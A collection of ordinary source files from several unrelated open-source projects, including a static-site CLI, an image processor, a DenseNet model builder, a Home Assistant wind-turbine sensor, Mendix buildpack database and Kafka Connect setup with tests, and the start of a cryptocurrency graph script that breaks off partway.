"""Prints the help information for Pavo or a specific command.
Args:
specified_command (str): The command to show help for. Defaults to None.
Raises:
UnknownCommandError: The specified command has not been registered or is unknown.
"""
command_list = _get_commands()
if not specified_command:
table = []
for command in command_list:
try:
table.append([command, command_list[command].__doc__.splitlines()[0]])
except AttributeError:
table.append([command, ''])
info(f'\nShowing help for all {len(command_list)} Pavo commands:\n')
echo(tabulate(table, tablefmt='plain'))
else:
if specified_command in command_list:
info(f'\nShowing help for {specified_command}:\n')
echo(command_list[specified_command].__doc__)
else:
raise UnknownCommandError
info(f'\nPavo v{get_distribution("pavo").version}\n')
exit()
if __name__ == '__main__':
_main(argv[1:])
```
#### File: pavo/cli/_messages.py
```python
import logging
from colorama import init, Fore, Style
from pavo.helpers.config import get_config_value
log = logging.getLogger('pavo')
try:
log.setLevel(get_config_value('logging.level'))
log.disabled = get_config_value('logging.enabled') == 'false'
# Only add a file formatter when the configuration file can be found
# This ensures that no log file exists outside of a Pavo project
file_formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
file_handler = logging.FileHandler('pavo.log')
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(file_formatter)
log.addHandler(file_handler)
log.propagate = False
except FileNotFoundError:
log.disabled = True
# Initialize Colorama
init()
def ask(msg):
"""Asks the user for input and returns the value.
Args:
msg (str): The input prompt for the user.
Returns:
str: The user input.
"""
return input(f'{Fore.YELLOW}> {msg}{Style.RESET_ALL}')
def debug(msg, **kwargs):
"""Silently logs the message to the debug log.
Args:
msg (str): The message that will be shown to the user.
kwargs: See below.
Keyword Arguments:
logger_name (str): Used to override the default 'pavo' name for the logger.
"""
if 'logger_name' in kwargs:
alt = logging.getLogger(kwargs['logger_name'])
alt.debug(msg)
else:
log.debug(msg)
def echo(msg, **kwargs):
"""Echo's back the message, without logging it.
Args:
msg (str): The message that will be shown to the user.
"""
print(f'{Fore.WHITE}{msg}{Style.RESET_ALL}')
def info(msg, **kwargs):
"""Shows information about runtime.
Args:
msg (str): The message that will be shown to the user.
"""
if kwargs.get('header', False):
print(f'{Fore.BLUE}{msg}{Style.RESET_ALL}')
else:
print(f'{Fore.WHITE}{msg}{Style.RESET_ALL}')
if not kwargs.get('disable_logging', False):
if 'logger_name' in kwargs:
alt = logging.getLogger(kwargs['logger_name'])
alt.info(msg)
else:
log.info(msg)
def warn(msg, **kwargs):
"""Shows a warning in the console and logs it to the Pavo log.
Args:
msg (str): The message that will be shown to the user.
kwargs: See below.
Keyword Arguments:
disable_logging (bool): When set to True, disables the log for a call.
logger_name (str): Used to override the default 'pavo' name for the logger.
"""
print(f'{Fore.YELLOW}{msg}{Style.RESET_ALL}')
if not kwargs.get('disable_logging', False):
if 'logger_name' in kwargs:
alt = logging.getLogger(kwargs['logger_name'])
alt.warning(msg)
else:
log.warning(msg)
def error(msg, exc=None, **kwargs):
"""Prints an error message to the terminal and, if provided, logs the exception.
Args:
msg (str): The message that will be shown to the user.
exc (Exception): The exception that was caught and lead to this error message.
kwargs: See below.
Keyword Arguments:
disable_logging (bool): When set to True, disables the log for a call.
logger_name (str): Used to override the default 'pavo' name for the logger.
unsafe (bool): When set to True, does not exist the program after catching error.
"""
print(f'{Fore.RED}{msg}{Style.RESET_ALL}')
if not kwargs.get('disable_logging', False) and exc is not None:
if 'logger_name' in kwargs:
alt = logging.getLogger(kwargs['logger_name'])
alt.exception(exc)
else:
log.exception(exc)
if 'unsafe' not in kwargs or kwargs['unsafe'] is False:
exit()
def success(msg, **kwargs):
"""Prints a green success message to the terminal and logs it.
Args:
msg (str): The message that will be shown to the user.
kwargs: See below.
Note:
The success log will be of type 'info'.
Keyword Arguments:
disable_logging (bool): When set to True, disables the log for a call.
logger_name (str): Used to override the default 'pavo' name for the logger.
disable_checkmark (bool): Whether or not to show a checkmark with the success message.
"""
if kwargs.get('disable_checkmark', False):
print(f'{Fore.GREEN}{msg}{Style.RESET_ALL}')
else:
print(f'{Fore.GREEN}\u2713 {msg}{Style.RESET_ALL}')
if not kwargs.get('disable_logging', False):
if 'logger_name' in kwargs:
alt = logging.getLogger(kwargs['logger_name'])
alt.info(msg)
else:
log.info(msg)
```
#### File: pavo/helpers/decorators.py
```python
from functools import wraps
def singleton(class_):
"""Singleton decorator for classes.
This decorator ensures there exists only one single entity of a class, which allows sharing of data by
accessing the class as a sort of global variable.
"""
instances = {}
def get_instance(*args, **kwargs):
if class_ not in instances:
instances[class_] = class_(*args, **kwargs)
return instances[class_]
return get_instance
def allow_outside_project(func):
"""Marks a Pavo entry point as allowed to run outside of a Pavo project."""
@wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.allowed_outside_project = True
return wrapper
``` |
{
"source": "jobveldhuis/python-mediaserver-processor",
"score": 2
} |
#### File: python-mediaserver-processor/mediaserver_processor/helpers.py
```python
import re
import os
import yaml
from watchgod import DefaultDirWatcher
import logging
class Config(dict):
"""
Configuration class, behaves like a standard dict.
"""
def __init__(self, *args, **kwargs):
super(Config, self).__init__(*args, **kwargs)
# Standard configuration settings, please do not overwrite but load using yaml template
# Directories
self['DIRECTORIES'] = {
'QUEUE_DIR': './queue',
'OUT_DIR': './out',
'TMP_DIR': './tmp',
'ORIGINALS_DIR': './originals',
'LOG_DIR': './logs'
}
# Actions
self['ALLOWED_FILE_TYPES'] = ['jpg', 'jpeg', 'png']
self['FILE_TYPE_TRANSPARENT'] = 'png'
self['FILE_TYPE_NONTRANSPARENT'] = 'jpeg'
self['ALWAYS_SAVE_AS'] = ['webp']
self['SOURCE_SET'] = [(100, 100), (250, 250)]
self['OPTIMIZE'] = True
self['HASH_FILE_NAMES'] = False
self['PROCESS_LEFTOVER_IMAGES'] = True
# What to do with unknown file types (not png, jpg or jpeg) or unprocessable images
self['HARD_KEEP_FILE_TYPE'] = True
self['HARD_DELETE_UNKNOWN_TYPES'] = True
self['HARD_DELETE_UNPROCESSABLE'] = True
# Settings for file permissions
self['OVERWRITE_FILE_PERMISSIONS'] = False
self['FILE_PERMISSIONS'] = None
# Safety feature to check for malicious files to be uploaded (Decompression Bombs)
self['MAX_IMAGE_PIXELS'] = 10000000
self['IGNORE_COMPRESSION_BOMBS'] = True
# Settings for logging
self['DISABLE_LOGGING'] = False
self['LOG_LEVEL'] = logging.INFO
self['LOG_FILE_NAME'] = 'mediaserver'
def load(self, file):
"""
Add key/value pairs to the configuration. Overwrite where necessary.
Parameters
----------
file : str
Relative path to the yaml-file to load into the configuration.
Returns
-------
None
"""
dictionary = load_yaml(file)
for item in dictionary:
self[item] = dictionary[item]
class FileWatcher(DefaultDirWatcher):
"""
Used to watch the directory for changes.
"""
def __init__(self, root_path):
self.include_pattern = re.compile(r"^[._]")
super().__init__(root_path)
def should_watch_file(self, entry):
"""
Returns whether or not the file should be watched. Ignores all files starting with a '.' or '_'
Parameters
----------
entry : os.DirEntry
The file that was found in the directory.
Returns
-------
bool
Whether or not the file should be watched.
"""
return not self.include_pattern.match(entry.name)
def should_watch_dir(self, entry):
"""
Returns false, so directory changes are ignored.
Parameter
---------
entry : os.DirEntry
The directory that was changed in the main directory.
Returns
-------
False : bool
Directories should be ignored, thus the value False is always returned.
"""
return False
def is_yaml(path):
"""
Checks whether the file at path is a yaml-file.
Parameters
----------
path : str
The relative path to the file that should be checked.
Returns
-------
bool
Whether or not the specified file is a yaml-file.
"""
return path.endswith('.yaml') or path.endswith('.yml')
def load_yaml(file):
"""
Loads a yaml-file into a Python dictionary.
Parameters
----------
file : str
Relative path to the file that should be loaded into a dict.
Raises
------
ValueError
When specified file is not a yaml-file, and thus, cannot be loaded.
Returns
-------
items : dict
The dictionary that was retrieved from the Yaml-file.
"""
if not is_yaml(file):
raise ValueError()
with open(file, 'r') as f:
items = yaml.load(f, Loader=yaml.FullLoader)
return items
``` |
{
"source": "jobvink/SnapshotEnsembles",
"score": 3
} |
#### File: SnapshotEnsembles/models/dense_net.py
```python
from tensorflow.keras.models import Model
from tensorflow.keras.layers import Dense, Dropout, Activation
from tensorflow.keras.layers import Conv2D
from tensorflow.keras.layers import AveragePooling2D
from tensorflow.keras.layers import GlobalAveragePooling2D
from tensorflow.keras.layers import Input, Concatenate
from tensorflow.keras.layers import BatchNormalization
from tensorflow.keras.regularizers import l2
import tensorflow.keras.backend as K
def conv_block(ip, nb_filter, dropout_rate=None, weight_decay=1E-4):
''' Apply BatchNorm, Relu 3x3, Conv2D, optional dropout
Args:
ip: Input tensorflow.keras tensor
nb_filter: number of filters
dropout_rate: dropout rate
weight_decay: weight decay factor
Returns: tensorflow.keras tensor with batch_norm, relu and Conv2D added
'''
concat_axis = 1 if K.image_data_format() == 'channels_first' else -1
x = BatchNormalization(axis=concat_axis, gamma_regularizer=l2(weight_decay),
beta_regularizer=l2(weight_decay))(ip)
x = Activation('relu')(x)
x = Conv2D(nb_filter, (3, 3), kernel_initializer='he_uniform', padding="same", use_bias=False,
activity_regularizer=l2(weight_decay))(x)
if dropout_rate:
x = Dropout(dropout_rate)(x)
return x
def transition_block(ip, nb_filter, dropout_rate=None, weight_decay=1E-4):
''' Apply BatchNorm, Relu 1x1, Conv2D, optional dropout and Maxpooling2D
Args:
ip: tensorflow.keras tensor
nb_filter: number of filters
dropout_rate: dropout rate
weight_decay: weight decay factor
Returns: tensorflow.keras tensor, after applying batch_norm, relu-conv, dropout, maxpool
'''
concat_axis = 1 if K.image_data_format() == 'channels_first' else -1
x = BatchNormalization(axis=concat_axis, gamma_regularizer=l2(weight_decay),
beta_regularizer=l2(weight_decay))(ip)
x = Activation('relu')(x)
x = Conv2D(nb_filter, (1, 1), kernel_initializer='he_uniform', padding="same", use_bias=False,
activity_regularizer=l2(weight_decay))(x)
if dropout_rate:
x = Dropout(dropout_rate)(x)
x = AveragePooling2D((2, 2), strides=(2, 2))(x)
return x
def dense_block(x, nb_layers, nb_filter, growth_rate, dropout_rate=None, weight_decay=1E-4):
''' Build a dense_block where the output of each conv_block is fed to subsequent ones
Args:
x: tensorflow.keras tensor
nb_layers: the number of layers of conv_block to append to the model.
nb_filter: number of filters
growth_rate: growth rate
dropout_rate: dropout rate
weight_decay: weight decay factor
Returns: tensorflow.keras tensor with nb_layers of conv_block appended
'''
concat_axis = 1 if K.image_data_format() == 'channels_first' else -1
feature_list = [x]
for i in range(nb_layers):
x = conv_block(x, growth_rate, dropout_rate, weight_decay)
feature_list.append(x)
x = Concatenate(axis=concat_axis)(feature_list)
nb_filter += growth_rate
return x, nb_filter
def create_dense_net(nb_classes, img_dim, depth=40, nb_dense_block=1, growth_rate=12, nb_filter=16, dropout_rate=None,
weight_decay=1E-4, verbose=True):
''' Build the create_dense_net model
Args:
nb_classes: number of classes
img_dim: tuple of shape (channels, rows, columns) or (rows, columns, channels)
depth: number or layers
nb_dense_block: number of dense blocks to add to end
growth_rate: number of filters to add
nb_filter: number of filters
dropout_rate: dropout rate
weight_decay: weight decay
Returns: tensorflow.keras tensor with nb_layers of conv_block appended
'''
model_input = Input(shape=img_dim)
concat_axis = 1 if K.image_data_format() == 'channels_first' else -1
assert (depth - 4) % 3 == 0, "Depth must be 3 N + 4"
# layers in each dense block
nb_layers = int((depth - 4) / 3)
# Initial convolution
x = Conv2D(nb_filter, (3, 3), padding="same", kernel_initializer='he_uniform', name="initial_conv2D", use_bias=False,
activity_regularizer=l2(weight_decay))(model_input)
# Add dense blocks
for block_idx in range(nb_dense_block - 1):
x, nb_filter = dense_block(x, nb_layers, nb_filter, growth_rate, dropout_rate=dropout_rate,
weight_decay=weight_decay)
# add transition_block
x = transition_block(x, nb_filter, dropout_rate=dropout_rate, weight_decay=weight_decay)
# The last dense_block does not have a transition_block
x, nb_filter = dense_block(x, nb_layers, nb_filter, growth_rate, dropout_rate=dropout_rate,
weight_decay=weight_decay)
x = BatchNormalization(gamma_regularizer=l2(weight_decay),
beta_regularizer=l2(weight_decay))(x)
x = Activation('relu')(x)
x = GlobalAveragePooling2D()(x)
x = Dense(nb_classes, activation='softmax', activity_regularizer=l2(weight_decay), bias_regularizer=l2(weight_decay))(x)
densenet = Model(inputs=model_input, outputs=x, name="create_dense_net")
if verbose: print("DenseNet-%d-%d created." % (depth, growth_rate))
return densenet
``` |
{
"source": "jobvk/Home-Assistant-Windcentrale",
"score": 2
} |
#### File: custom_components/windcentrale/binary_sensor.py
```python
from homeassistant.components.binary_sensor import BinarySensorEntity
from .const import DOMAIN
async def async_setup_entry(hass, config_entry, async_add_devices):
"""Add sensors for passed config_entry in HA."""
wind = hass.data[DOMAIN][config_entry.entry_id]
new_devices = []
for windturbine in wind.windturbines:
new_devices.append(PulsingSensor(windturbine))
if new_devices:
async_add_devices(new_devices)
class SensorBase(BinarySensorEntity):
"""Base representation of a windcentrale turbine."""
def __init__(self, windturbine):
"""Initialize the sensor."""
self._windturbine = windturbine
@property
def device_info(self):
"""Information about this wind turbine"""
return {
"identifiers": {(DOMAIN, self._windturbine.windturbine_id)},
"name": self._windturbine.name,
"model": self._windturbine.model,
"manufacturer": self._windturbine.manufacturer,
}
@property
def available(self) -> bool:
"""Return true if windturbine live sensor is available."""
return self._windturbine.live_status
class PulsingSensor(SensorBase):
"""Representation of a Sensor."""
def __init__(self, windturbine):
"""Initialize the sensor."""
super().__init__(windturbine)
self._state = None
@property
def unique_id(self) -> str:
"""Unique ID for the sensor."""
return f"{self._windturbine.name} Pulsating"
@property
def name(self) -> str:
"""Name for the sensor."""
return f"{self._windturbine.name} Pulsating"
@property
def state(self) -> bool:
"""State value for the sensor."""
return self._state
@property
def icon(self) -> str:
"""Icon for the sensor."""
return "mdi:pulse"
def update(self):
"""Update the sensor."""
if self._windturbine.live_data:
self._state = self._windturbine.live_data["pulsating"]
return self._state
else:
return None
``` |
{
"source": "jobvs/cf-mendix-buildpack",
"score": 2
} |
#### File: scripts/generators/stream.py
```python
import json
from buildpack.databroker.config_generator.scripts.utils import (
template_engine_instance,
)
def generate_config(config):
topologies = {"topologies": []}
env = template_engine_instance()
template = env.get_template("streaming_producer.json.j2")
for service in config.DataBrokerConfiguration.publishedServices:
for entity in service.entities:
renderedTemplate = template.render(entity=entity)
renderedTemplateAsJson = json.loads(renderedTemplate)
topologies["topologies"].append(renderedTemplateAsJson)
return json.dumps(topologies)
```
#### File: buildpack/databroker/connect.py
```python
import os
import time
import logging
import json
import backoff
import requests
from buildpack import util
from buildpack.databroker.process_supervisor import DataBrokerProcess
from buildpack.databroker.config_generator.scripts.generators import (
debezium as debezium_generator,
kafka_connect as connect_generator,
loggers as loggers_generator,
)
from buildpack.databroker.config_generator.scripts.utils import write_file
# Compile constants
BASE_URL = "/mx-buildpack/experimental/databroker/"
KAFKA_CONNECT_FILENAME = "kafka-connect"
KAFKA_CONNECT_VERSION = "2.13-2.5.1-v2"
DBZ_FILENAME = "debezium"
PKG_FILE_EXT = "tar.gz"
BASE_DIR = "databroker"
DBZ_DIR = "debezium"
PROCESS_NAME = "kafka-connect"
KAFKA_CONNECT_DIR = PROCESS_NAME
DBZ_CFG_NAME = "debezium-connector.json"
KAFKA_CONNECT_CFG_NAME = "connect.properties"
LOG4J_DEBEZIUM_CFG_NAME = "debezium-log4j.properties"
DEFAULT_DBZ_VERSION = "1.2.0"
DBZ_VERSION = os.getenv("DATABROKER_DBZ_VERSION")
if not DBZ_VERSION:
DBZ_VERSION = DEFAULT_DBZ_VERSION
# Run constants
LOCAL = ".local"
KAFKA_CONNECT_START_PATH = os.path.join(
LOCAL, BASE_DIR, KAFKA_CONNECT_DIR, "bin", "connect-distributed.sh"
)
KAFKA_CONNECT_CFG_PATH = os.path.join(
LOCAL, BASE_DIR, KAFKA_CONNECT_DIR, KAFKA_CONNECT_CFG_NAME
)
LOG4J_CFG_PATH = os.path.join(
LOCAL, BASE_DIR, KAFKA_CONNECT_DIR, LOG4J_DEBEZIUM_CFG_NAME
)
DBZ_HOME_DIR = os.path.join(LOCAL, BASE_DIR, DBZ_DIR)
CONNECT_URL = "http://localhost:8083/connectors"
INITIAL_WAIT = 15
MAX_RETRIES = 8
BACKOFF_TIME = 5
KAFKA_CONNECT_JMX_PORT = "11003"
def _download_pkgs(install_path, cache_dir):
# Download kafka connect and debezium
KAFKA_CONNECT_DOWNLOAD_URL = "{}{}-{}.{}".format(
BASE_URL, KAFKA_CONNECT_FILENAME, KAFKA_CONNECT_VERSION, PKG_FILE_EXT,
)
util.download_and_unpack(
util.get_blobstore_url(KAFKA_CONNECT_DOWNLOAD_URL),
os.path.join(install_path, BASE_DIR, KAFKA_CONNECT_DIR),
cache_dir=cache_dir,
)
DBZ_DOWNLOAD_URL = "{}{}-{}.{}".format(
BASE_URL, DBZ_FILENAME, DBZ_VERSION, PKG_FILE_EXT
)
util.download_and_unpack(
util.get_blobstore_url(DBZ_DOWNLOAD_URL),
os.path.join(install_path, BASE_DIR, DBZ_DIR),
cache_dir=cache_dir,
)
def stage(install_path, cache_dir):
_download_pkgs(install_path, cache_dir)
def setup_configs(complete_conf):
connect_config = connect_generator.generate_config(complete_conf)
write_file(KAFKA_CONNECT_CFG_PATH, connect_config)
connect_logging = loggers_generator.generate_kafka_connect_logging_config(
complete_conf
)
write_file(LOG4J_CFG_PATH, connect_logging)
def run(complete_conf):
setup_configs(complete_conf)
java_path = os.path.join(os.getcwd(), LOCAL, "bin")
os.environ["PATH"] += os.pathsep + java_path
os.environ["JMX_PORT"] = KAFKA_CONNECT_JMX_PORT
os.environ["KAFKA_LOG4J_OPTS"] = (
"-Dlog4j.configuration=file:"
+ os.path.join(os.getcwd(), LOG4J_CFG_PATH)
)
kafka_connect_heap_opts = os.environ.get(
"DATABROKER_KAFKA_CONNECT_HEAP_OPTS", "-Xms512M -Xmx2G"
)
os.environ["KAFKA_HEAP_OPTS"] = kafka_connect_heap_opts
env = dict(os.environ)
kafka_connect_process = DataBrokerProcess(
PROCESS_NAME, (KAFKA_CONNECT_START_PATH, KAFKA_CONNECT_CFG_PATH), env,
)
# Wait for kafka connect to initialize and then issue a request for debezium connector
time.sleep(INITIAL_WAIT)
debezium_config = json.loads(
debezium_generator.generate_config(complete_conf)
)
def backoff_hdlr(details):
logging.warn(
"Databroker: Failed to receive successful response from connect. Retrying...({}/{})".format(
details["tries"], MAX_RETRIES
)
)
def giveup_hdlr(details):
logging.error("Databroker: Kafka Connect wait retries exhaused")
raise Exception("Databroker: Kafka Connect failed to start")
@backoff.on_predicate(
backoff.constant,
interval=BACKOFF_TIME,
max_tries=MAX_RETRIES,
on_backoff=backoff_hdlr,
on_giveup=giveup_hdlr,
)
@backoff.on_exception(
backoff.constant,
Exception,
interval=BACKOFF_TIME,
max_tries=MAX_RETRIES,
on_backoff=backoff_hdlr,
on_giveup=giveup_hdlr,
)
def start_debezium_connector():
return requests.put(
"{}/{}/{}".format(CONNECT_URL, debezium_config["name"], "config"),
json=debezium_config["config"],
)
start_debezium_connector()
return kafka_connect_process
```
#### File: lib/m2ee/util.py
```python
import os
import shutil
import subprocess
import socket
import http.client
from .log import logger
try:
import readline
# allow - in filenames we're completing without messing up completion
readline.set_completer_delims(
readline.get_completer_delims().replace("-", "")
)
except ImportError:
pass
try:
import httplib2
except ImportError:
logger.critical(
"Failed to import httplib2. This module is needed by "
"m2ee. Please povide it on the python library path"
)
raise
def unpack(config, mda_name):
mda_file_name = os.path.join(config.get_model_upload_path(), mda_name)
if not os.path.isfile(mda_file_name):
logger.error("file %s does not exist" % mda_file_name)
return False
logger.debug("Testing archive...")
cmd = ("unzip", "-tqq", mda_file_name)
logger.trace("Executing %s" % str(cmd))
try:
proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
(stdout, stderr) = proc.communicate()
if proc.returncode != 0:
logger.error(
"An error occured while testing archive " "consistency:"
)
logger.error("stdout: %s" % stdout)
logger.error("stderr: %s" % stderr)
return False
else:
logger.trace("stdout: %s" % stdout)
logger.trace("stderr: %s" % stderr)
except OSError as ose:
import errno
if ose.errno == errno.ENOENT:
logger.error(
"The unzip program could not be found: %s" % ose.strerror
)
else:
logger.error("An error occured while executing unzip: %s" % ose)
return False
logger.debug("Removing everything in model/ and web/ locations...")
# TODO: error handling. removing model/ and web/ itself should not be
# possible (parent dir is root owned), all errors ignored for now
app_base = config.get_app_base()
shutil.rmtree(os.path.join(app_base, "model"), ignore_errors=True)
shutil.rmtree(os.path.join(app_base, "web"), ignore_errors=True)
logger.debug("Extracting archive...")
cmd = ("unzip", "-oq", mda_file_name, "web/*", "model/*", "-d", app_base)
logger.trace("Executing %s" % str(cmd))
proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
(stdout, stderr) = proc.communicate()
if proc.returncode != 0:
logger.error("An error occured while extracting archive:")
logger.error("stdout: %s" % stdout)
logger.error("stderr: %s" % stderr)
return False
else:
logger.trace("stdout: %s" % stdout)
logger.trace("stderr: %s" % stderr)
# XXX: reset permissions on web/ model/ to be sure after executing this
# function
return True
def fix_mxclientsystem_symlink(config):
logger.debug("Running fix_mxclientsystem_symlink...")
mxclient_symlink = os.path.join(
config.get_public_webroot_path(), "mxclientsystem"
)
logger.trace("mxclient_symlink: %s" % mxclient_symlink)
real_mxclientsystem_path = config.get_real_mxclientsystem_path()
logger.trace("real_mxclientsystem_path: %s" % real_mxclientsystem_path)
if os.path.islink(mxclient_symlink):
current_real_mxclientsystem_path = os.path.realpath(mxclient_symlink)
if current_real_mxclientsystem_path != real_mxclientsystem_path:
logger.debug(
"mxclientsystem symlink exists, but points "
"to %s" % current_real_mxclientsystem_path
)
logger.debug(
"redirecting symlink to %s" % real_mxclientsystem_path
)
os.unlink(mxclient_symlink)
os.symlink(real_mxclientsystem_path, mxclient_symlink)
elif not os.path.exists(mxclient_symlink):
logger.debug(
"creating mxclientsystem symlink pointing to %s"
% real_mxclientsystem_path
)
try:
os.symlink(real_mxclientsystem_path, mxclient_symlink)
except OSError as e:
logger.error("creating symlink failed: %s" % e)
else:
logger.warn(
"Not touching mxclientsystem symlink: file exists "
"and is not a symlink"
)
def run_post_unpack_hook(post_unpack_hook):
if os.path.isfile(post_unpack_hook):
if os.access(post_unpack_hook, os.X_OK):
logger.info("Running post-unpack-hook: %s" % post_unpack_hook)
retcode = subprocess.call((post_unpack_hook,))
if retcode != 0:
logger.error(
"The post-unpack-hook returned a "
"non-zero exit code: %d" % retcode
)
else:
logger.error(
"post-unpack-hook script %s is not "
"executable." % post_unpack_hook
)
else:
logger.error(
"post-unpack-hook script %s does not exist." % post_unpack_hook
)
def check_download_runtime_existence(url):
h = httplib2.Http(timeout=10)
logger.debug("Checking for existence of %s via HTTP HEAD" % url)
try:
(response_headers, response_body) = h.request(url, "HEAD")
logger.trace("Response headers: %s" % response_headers)
except (
httplib2.HttpLib2Error,
http.client.HTTPException,
socket.error,
) as e:
logger.error(
"Checking download url %s failed: %s: %s"
% (url, e.__class__.__name__, e)
)
return False
if response_headers["status"] == "200":
logger.debug("Ok, got HTTP 200")
return True
if response_headers["status"] == "404":
logger.error("The location %s cannot be found." % url)
return False
logger.error(
"Checking download url %s failed, HTTP status code %s"
% (url, response_headers["status"])
)
return False
def download_and_unpack_runtime(url, path):
if not check_download_runtime_existence(url):
return
logger.info("Going to download and extract %s to %s" % (url, path))
p1 = subprocess.Popen(["wget", "-O", "-", url,], stdout=subprocess.PIPE)
p2 = subprocess.Popen(
["tar", "xz", "-C", path,], stdin=p1.stdout, stdout=subprocess.PIPE
)
p1.stdout.close()
stdout, stderr = p2.communicate()
if p2.returncode == 0:
logger.info("Successfully downloaded runtime!")
return True
else:
logger.error("Could not download and unpack runtime:")
logger.error(stderr)
return False
```
#### File: tests/integration/test_termination.py
```python
from tests.integration import basetest
class TestCaseTermination(basetest.BaseTest):
# Tests that the process terminates with a stack trace when Python code
# errors. The env variable S3_ENCRYPTION_KEYS is used here, it doesn't
# have a try-except on it.
# TODO determine if we can unit test this / should test this
def test_termination_stacktrace(self):
self.stage_container(
"Mendix8.1.1.58432_StarterApp.mda",
env_vars={"S3_ENCRYPTION_KEYS": "{invalid-json}"},
)
with self.assertRaises(RuntimeError):
self.start_container()
self.assert_string_in_recent_logs(
'json.loads(os.getenv("S3_ENCRYPTION_KEYS"))'
)
def test_termination_broken_application(self):
self.stage_container(
"Sample-StartError-7.23.2.mda",
env_vars={
"DEPLOY_PASSWORD": <PASSWORD>,
"METRICS_INTERVAL": "10",
},
)
self.start_container(status="unhealthy")
self.assert_string_in_recent_logs("start failed, stopping")
self.assert_string_not_in_recent_logs("health check never passed")
def test_java_crash_triggers_unhealthy(self):
self.stage_container(
"sample-6.2.0.mda",
env_vars={
"DEPLOY_PASSWORD": <PASSWORD>,
"METRICS_INTERVAL": "10",
},
)
self.start_container()
self.assert_app_running()
self.run_on_container("killall java")
assert self.await_container_status("unhealthy", 60)
```
#### File: tests/unit/test_db_config_options.py
```python
import os
import unittest
from buildpack.runtime_components.database import get_config
class TestDatabaseConfigOptions(unittest.TestCase):
def clean_env(self):
# Setting different environment variables for test in the same process
# can lead to flaky tests.
if "DATABASE_URL" in os.environ.keys():
del os.environ["DATABASE_URL"]
for key in filter(
lambda x: x.startswith("MXRUNTIME_Database"),
list(os.environ.keys()),
):
del os.environ[key]
def test_no_setup(self):
self.clean_env()
with self.assertRaises(RuntimeError):
get_config()
def test_mx_runtime_db_config(self):
# Test if MXRUNTIME variables are set up if no database configuration is returned
# based on DATABASE_URL or VCAP_SERVICES
self.clean_env()
os.environ["MXRUNTIME_DatabaseType"] = "PostgreSQL"
os.environ[
"MXRUNTIME_DatabaseJdbcUrl"
] = "jdbc:postgresql://username:password@rdsbroker-testfree-nonprod-1-eu-west-1.asdbjasdg.eu-west-1.rds.amazonaws.com:5432/testdatabase" # noqa E501
config = get_config()
assert not config
def test_database_url(self):
self.clean_env()
os.environ[
"DATABASE_URL"
] = "jdbc:postgres://user:secret@host/database"
config = get_config()
assert config
assert config["DatabaseType"] == "PostgreSQL"
def test_vcap(self):
self.clean_env()
os.environ[
"VCAP_SERVICES"
] = """
{
"rds-testfree": [
{
"binding_name": null,
"credentials": {
"db_name": "dbuajsdhkasdhaks",
"host": "rdsbroker-testfree-nonprod-1-eu-west-1.asdbjasdg.eu-west-1.rds.amazonaws.com",
"password": "<PASSWORD>",
"uri": "postgres://ua98s7ananla:na8<EMAIL>:5432/dbuajsdhkasdhaks",
"username": "ua98s7ananla"
},
"instance_name": "ops-432a659e.test.foo.io-database",
"label": "rds-testfree",
"name": "ops-432a659e.test.foo.io-database",
"plan": "shared-psql-testfree",
"provider": null,
"syslog_drain_url": null,
"tags": [
"database",
"RDS",
"postgresql"
],
"volume_mounts": []
}
]
}
""" # noqa
config = get_config()
assert config
assert config["DatabaseType"] == "PostgreSQL"
``` |
{
"source": "JobyB/PoolBot",
"score": 3
} |
#### File: JobyB/PoolBot/loggingUtils.py
```python
from __future__ import (division, print_function)
import os
import sys
import yaml
import time
import logging
import logging.config
import logging.handlers
# Find our current dir and set our base dir
base_dir = os.path.dirname(os.path.abspath(__file__))
# Defile the location to find logs
loggingPath = os.path.join(base_dir, 'logs')
# Define the available log levels
valid_log_levels = ['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL']
# Create a custom handler for files
class MyFileHandler(logging.handlers.RotatingFileHandler):
def __init__(self, filename, mode='a', encoding=None, delay=0, maxBytes=2097152, backupCount=5):
if not os.path.exists(loggingPath):
os.makedirs(loggingPath)
fullpath = os.path.join(loggingPath, filename)
logging.handlers.RotatingFileHandler.__init__(self, fullpath, mode=mode, encoding=encoding, delay=delay, maxBytes=maxBytes, backupCount=backupCount)
# Create a custom handler so critical level logs call sys.exit(1)
class ShutdownHandler(logging.StreamHandler):
def emit(self, record):
self.format(record)
logging.shutdown()
sys.exit(1)
def log_setup(logger_name, logging_level):
logging_data = yaml.safe_load(open(os.path.join(base_dir, 'conf', 'logging.yaml')))
# Update the console handler from cmd line if required
if logging_level != '':
if logging_level.upper() in valid_log_levels:
if logging_level.upper() != logging_data['handlers']['console']['level']:
print('Setting logging level from cmd line to: ' + str(logging_level.upper()))
logging_data['handlers']['console']['level'] = logging_level.upper()
else:
print('ERROR: ' + logging_level + ' is not a valid log level')
print('ERROR: Valid log levels: ' + str(valid_log_levels))
sys.exit(1)
# Load our logging config into the logger
logging.config.dictConfig(logging_data)
# Create an instance of our logger
log = logging.getLogger(logger_name)
log.info('')
log.info('#####################################')
log.info('System Init ' + str(time.strftime("%Y-%m-%d %H:%M:%S")))
log.info('#####################################')
return log
def shutdown_logging():
logging.shutdown()
# execute as standalone program
if __name__ == '__main__':
print('This is a Python module, not designed to be run as a standalone program')
``` |
{
"source": "jobymathew/Cryptocurrency_Trade_Details_and_Overview",
"score": 4
} |
#### File: jobymathew/Cryptocurrency_Trade_Details_and_Overview/cryptoGraph.py
```python
import sys
import argparse
import numpy as np
import pickle
# importing copy to perform deep copy of classes
import copy
# importing csv to read the csv file
import csv
# Minh Dao - Tutor <NAME>
# Using the Graph class which I made during the practicals - Modified for the assignment
from DSAGraph import DSAGraph
from Asset import AssetObject
import json
# Setting up the argument parser
ap = argparse.ArgumentParser()
# Adding the argument for interactive test enviornment
ap.add_argument("-i", "--interactive", help='interactive testing enviornment', action='store_true')
# Adding the argument for report mode
ap.add_argument("-r", "--report", nargs='+', help='report mode')
# Getting the argument variables
args = vars(ap.parse_args())
# Function to load the exchange data (asset data)
def loadAssetData():
for i, row in enumerate(asset_data):
if i != 0 and i != 1:
circulatingSupply = None
if row[7] == '?':
circulatingSupply = '0'
else:
circulatingSupply = row[7]
volume = None
if row[8] == '$?':
volume = '0'
else:
volumeSplit = row[8][1:].strip().split(',')
volume = ''
for val in volumeSplit:
volume += val
if i < 10:
priceSplit = row[5][1:].strip().split(',')
